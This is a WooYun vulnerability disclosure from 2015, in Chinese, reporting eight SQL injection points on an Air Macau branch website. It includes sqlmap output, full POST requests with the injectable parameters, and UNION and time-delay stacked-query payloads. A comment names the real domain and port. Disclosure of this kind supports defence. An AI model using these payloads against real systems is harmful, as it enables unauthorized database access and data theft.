当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0156029

漏洞标题:澳门航空分站大陆业务8处SQL注入漏洞(臺灣地區)

相关厂商:澳门航空

漏洞作者: 路人甲

提交时间:2015-11-26 14:04

修复时间:2016-01-14 11:20

公开时间:2016-01-14 11:20

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-26: 细节已通知厂商并且等待厂商处理中
2015-11-30: 厂商已经确认,细节仅向厂商公开
2015-12-10: 细节向核心白帽子及相关领域专家公开
2015-12-20: 细节向普通白帽子公开
2015-12-30: 细节向实习白帽子公开
2016-01-14: 细节向公众公开

简要描述:

详细说明:

第一处:
http://**.**.**.**:8083/holidays/hotel_detail.asp?route=mfm&seq=30

[11:18:50] [INFO] testing MySQL
[11:18:50] [WARNING] the back-end DBMS is not MySQL
[11:18:50] [INFO] testing Oracle
[11:18:50] [WARNING] the back-end DBMS is not Oracle
[11:18:50] [INFO] testing PostgreSQL
[11:18:51] [WARNING] the back-end DBMS is not PostgreSQL
[11:18:51] [INFO] testing Microsoft SQL Server
[11:18:51] [INFO] confirming Microsoft SQL Server
[11:18:51] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2005
[11:18:51] [INFO] fetching current user
[11:18:51] [WARNING] running in a single-thread mode. Please c
ption '--threads' for faster data retrieval
[11:18:51] [INFO] retrieved: guestuser
current user:    'guestuser'


第二处:
http://**.**.**.**:8083/about/news_articles.asp?id=21

[11:19:52] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2005
[11:19:52] [INFO] fetching current user
[11:19:52] [INFO] resumed: guestuser
current user:    'guestuser'


第三处:
http://**.**.**.**:8083/tips/tips_intro.asp?unqid=1

current user:    'guestuser'


第4处:
http://**.**.**.**:8083/airshopping/eshopping_intro.asp?item=51002922

[11:31:13] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2005
[11:31:13] [INFO] fetching current user
[11:31:13] [INFO] retrieved:guestuser


第5处:
是post注入
还是可以union的

Place: POST
Parameter: fnum
    Type: UNION query
    Title: Generic UNION query (NULL) - 15 columns
    Payload: fnum=11' UNION ALL SELECT NULL, NULL, NULL, CHAR(58)+CHAR(121)
(103)+CHAR(102)+CHAR(58)+CHAR(72)+CHAR(113)+CHAR(69)+CHAR(65)+CHAR(110)+CHA
)+CHAR(118)+CHAR(106)+CHAR(118)+CHAR(106)+CHAR(58)+CHAR(103)+CHAR(106)+CHAR
CHAR(58), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-
D 'OCTx'='OCTx&year=2015&month=NOV&day=26&method=1
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: fnum=11'; WAITFOR DELAY '0:0:5';-- AND 'nsZp'='nsZp&year=2015&
=NOV&day=26&method=1
---
[11:40:02] [INFO] testing MySQL
[11:40:02] [WARNING] the back-end DBMS is not MySQL
[11:40:02] [INFO] testing Oracle
[11:40:02] [WARNING] the back-end DBMS is not Oracle
[11:40:02] [INFO] testing PostgreSQL
[11:40:03] [WARNING] the back-end DBMS is not PostgreSQL
[11:40:03] [INFO] testing Microsoft SQL Server
[11:40:03] [INFO] confirming Microsoft SQL Server
[11:40:04] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows Vista
web application technology: ASP.NET, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2005
[11:40:04] [INFO] fetching current user
current user:    'guestuser'


漏洞证明:

第1处:
post注入

POST /timetable/flight_status.asp HTTP/1.1
Host: **.**.**.**:8084
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://**.**.**.**:8084/
Cookie: __utma=21557931.85516253.1448242838.1448242838.1448242838.1; __utmz=21557931.1448242838.1.1.utmccn=(organic)|utmcsr=baidu|utmctr=|utmcmd=organic; ASPSESSIONIDCQTDQQDA=PIJFMPNCFKHCPNBNDCEFBOJB; __atuvc=1%7C47; ASPSESSIONIDCSSCQQDA=MLNDPKCDABFJPGMCKAOELNGF; ASPSESSIONIDASRASQDA=PGEBIJCDBMFLJLFMHENHOKJG; ASPSESSIONIDAQRATQDA=FEFDDHCDJLDOEJIPCIPIJNHO; ASPSESSIONIDCQRBSQDB=NNHJKNDDJLIEDCFDLDDJPNFK; ASPSESSIONIDCQQARQCA=NOMDFGKCEBOPNAALPDFIDHOJ; _ga=GA1.3.85516253.1448242838; _gat=1; ASPSESSIONIDASTBTQDB=DDLHFKEDOPOKIOCKNKPLLMMI
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 74
from=HGH&dest=HGH&year=2015&month=NOV&day=26&method=2&Submit2=%C8%B7%C8%CF


[0] place: POST, parameter: from, type: Single quoted string (default)
[1] place: POST, parameter: dest, type: Single quoted string
[q] Quit
>
[13:44:29] [INFO] testing MySQL
[13:44:29] [WARNING] the back-end DBMS is not MySQL
[13:44:29] [INFO] testing Oracle
[13:44:29] [WARNING] the back-end DBMS is not Oracle
[13:44:29] [INFO] testing PostgreSQL
[13:44:30] [WARNING] the back-end DBMS is not PostgreSQL
[13:44:30] [INFO] testing Microsoft SQL Server
[13:44:30] [INFO] confirming Microsoft SQL Server
[13:44:31] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows Vista
web application technology: ASP.NET, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2005
[13:44:31] [INFO] fetching current user
current user:    'guestuser'


======================================================
第2处:
还是post注入

POST /b2b/b2blogin.asp HTTP/1.1
Host: **.**.**.**:8084
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://**.**.**.**:8084/b2b/b2blogin.asp
Cookie: __utma=21557931.85516253.1448242838.1448242838.1448242838.1; __utmz=21557931.1448242838.1.1.utmccn=(organic)|utmcsr=baidu|utmctr=|utmcmd=organic; ASPSESSIONIDCQTDQQDA=PIJFMPNCFKHCPNBNDCEFBOJB; __atuvc=1%7C47; ASPSESSIONIDCSSCQQDA=MLNDPKCDABFJPGMCKAOELNGF; ASPSESSIONIDASRASQDA=PGEBIJCDBMFLJLFMHENHOKJG; ASPSESSIONIDAQRATQDA=FEFDDHCDJLDOEJIPCIPIJNHO; ASPSESSIONIDCQRBSQDB=NNHJKNDDJLIEDCFDLDDJPNFK; ASPSESSIONIDCQQARQCA=NOMDFGKCEBOPNAALPDFIDHOJ; _ga=GA1.3.85516253.1448242838; ASPSESSIONIDASTBTQDB=DDLHFKEDOPOKIOCKNKPLLMMI
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
userid=dafasf&passwd=asfasf&image=%B5%C7+%C8%EB


[14:19:26] [INFO] testing MySQL
[14:19:26] [WARNING] the back-end DBMS is not MySQL
[14:19:26] [INFO] testing Oracle
[14:19:27] [WARNING] the back-end DBMS is not Oracle
[14:19:27] [INFO] testing PostgreSQL
[14:19:27] [WARNING] the back-end DBMS is not PostgreSQL
[14:19:27] [INFO] testing Microsoft SQL Server
[14:19:27] [INFO] confirming Microsoft SQL Server
[14:19:29] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows Vista
web application technology: ASP.NET, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2005
[14:19:29] [INFO] fetching current user
current user:    'guestuser'


=============================================================
第3处:
get型注入
http://**.**.**.**:8084/tips/tips_intro.asp?unqid=23

{ZZJ$7P``XKIJ6X[{2_77~K.png


开跑

[14:21:13] [INFO] fetching current user
current user:    'guestuser'

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-11-30 11:19

厂商回复:

感謝通報

最新状态:

暂无

漏洞评价:

评价

  1. 2015-11-29 11:00 | Hitcon台湾互联网漏洞报告平台(乌云厂商)

    :8083 皆無法以sqlmap得到相同結果

  2. 2015-11-30 09:57 | 牛 小 帅 ( 普通白帽子 | Rank:1101 漏洞数:257 | 1.乌云最帅的男人 ...)

    @Hitcon台湾互联网漏洞报告平台 全部可以的呀

  3. 2015-11-30 10:39 | Hitcon台湾互联网漏洞报告平台(乌云厂商)

    以第一处為例:http://www.airmacau.com.tw:8083/holidays/hotel_detail.asp?route=mfm&seq=30麻煩--flush-session跑一次

  4. 2015-11-30 10:49 | 牛 小 帅 ( 普通白帽子 | Rank:1101 漏洞数:257 | 1.乌云最帅的男人 ...)

    @Hitcon台湾互联网漏洞报告平台 1-3修复了 其他都还行 第一:我跑的时候都可以 第二:确认时间太久都4天了,然后这几个参数每个站都有,提交的人数也多,修复了也不奇怪

  5. 2015-11-30 11:16 | Hitcon台湾互联网漏洞报告平台(乌云厂商)

    了解 感謝